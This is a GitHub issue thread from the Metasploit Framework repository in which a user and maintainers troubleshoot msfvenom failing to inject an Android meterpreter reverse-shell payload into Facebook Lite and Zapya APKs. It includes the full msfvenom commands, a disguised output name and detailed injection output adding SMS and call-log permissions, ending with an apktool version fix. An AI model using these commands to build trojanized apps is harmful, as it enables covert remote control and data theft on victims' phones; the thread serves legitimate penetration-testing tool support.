search

rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
33.79k stars 13.9k forks source link

App not installed #8724

Closed BlaacckK closed 7 years ago

BlaacckK commented 7 years ago

msfvenom -x Facebooklite_v_50.apk -p android/meterpret/reverse_tcp LHOST=IP LPORT=port -o /root/Desktop/Facebook.apk embedded metasploit payload in a apk using thr above command when i install it on android running 6.0.1 it says app not installed. however normal android payload made with this command msfvenom -p android/meterpret/reverse_tcp LHOST=IP LPORT=port -o /root/Desktop/Facebook.apk works great

Thanks

busterb commented 7 years ago

Probably anti-reversing in Facebook. Try and compare to Uber.

BlaacckK commented 7 years ago

i tried with other apps works fine on most of apps.

sempervictus commented 7 years ago

You may need to turn to some external backdooring tools for different apk protection schemes... At least till we have em covered here. Any notes you can compile while addressing this would help in that effort.

BlaacckK commented 7 years ago

msfvenom -x zapya.apk -p android/meterpreter/reverse_http LHOST=LHOST LPORT=4444 -o /root/Desktop/Zapya.apk Using APK template: zapya.apk No platform was selected, choosing Msf::Module::Platform::Android from the payload No Arch selected, selecting Arch: dalvik from the payload [] Creating signing key and keystore.. [] Decompiling original APK.. [] Decompiling payload APK.. [] Locating hook point.. [] Adding payload as package com.dewmobile.kuaiya.arjam [] Loading /tmp/d20170726-1573-17y8bl2/original/smali/com/dewmobile/kuaiya/app/MyApplication.smali and injecting payload.. [] Poisoning the manifest with meterpreter permissions.. [] Adding [] Adding [] Adding [] Adding [] Adding [] Adding [] Rebuilding zapya.apk with meterpreter injection as /tmp/d20170726-1573-17y8bl2/output.apk

For zapya it stucks here doesn't go any further

timwr commented 7 years ago

@BlaacckK I can't reproduce this. It injects into Facebook lite just fine:

msfvenom -x ../../apks/facebook_lite_v52.0.0.4.89.apk -p android/meterpreter/reverse_tcp LHOST=LHOST LPORT=4444 -o out.apk
Using APK template: ../../apks/facebook_lite_v52.0.0.4.89.apk
No platform was selected, choosing Msf::Module::Platform::Android from the payload
No Arch selected, selecting Arch: dalvik from the payload
[*] Creating signing key and keystore..
[*] Decompiling original APK..
[*] Decompiling payload APK..
[*] Locating hook point..
[*] Adding payload as package com.facebook.lite.xqrmc
[*] Loading /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/original/smali/com/facebook/lite/LiteAppShell.smali and injecting payload..
[*] Poisoning the manifest with meterpreter permissions..
[*] Adding <uses-permission android:name="android.permission.WRITE_CALL_LOG"/>
[*] Adding <uses-permission android:name="android.permission.RECEIVE_SMS"/>
[*] Adding <uses-permission android:name="android.permission.SET_WALLPAPER"/>
[*] Adding <uses-permission android:name="android.permission.WRITE_SETTINGS"/>
[*] Adding <uses-permission android:name="android.permission.SEND_SMS"/>
[*] Rebuilding ../../apks/facebook_lite_v52.0.0.4.89.apk with meterpreter injection as /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/output.apk
[*] Signing /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/output.apk
[*] Aligning /var/folders/jp/bhxfpbm904nctz6j03rm2drh0000gp/T/d20170728-83157-1lzs1vg/output.apk
Payload size: 1263312 bytes
Saved as: out.apk
Success

The app can then be installed and gives a session as normal.

timwr commented 7 years ago

Do you have the latest apktool? I have 2.2.2:

$ apktool -v
Apktool v2.2.2 - a tool for reengineering Android apk files
with smali v2.1.3 and baksmali v2.1.3
BlaacckK commented 7 years ago

No, i have 2.2.1 That must be the problem Thanks

BlaacckK commented 7 years ago

i'll upgrade it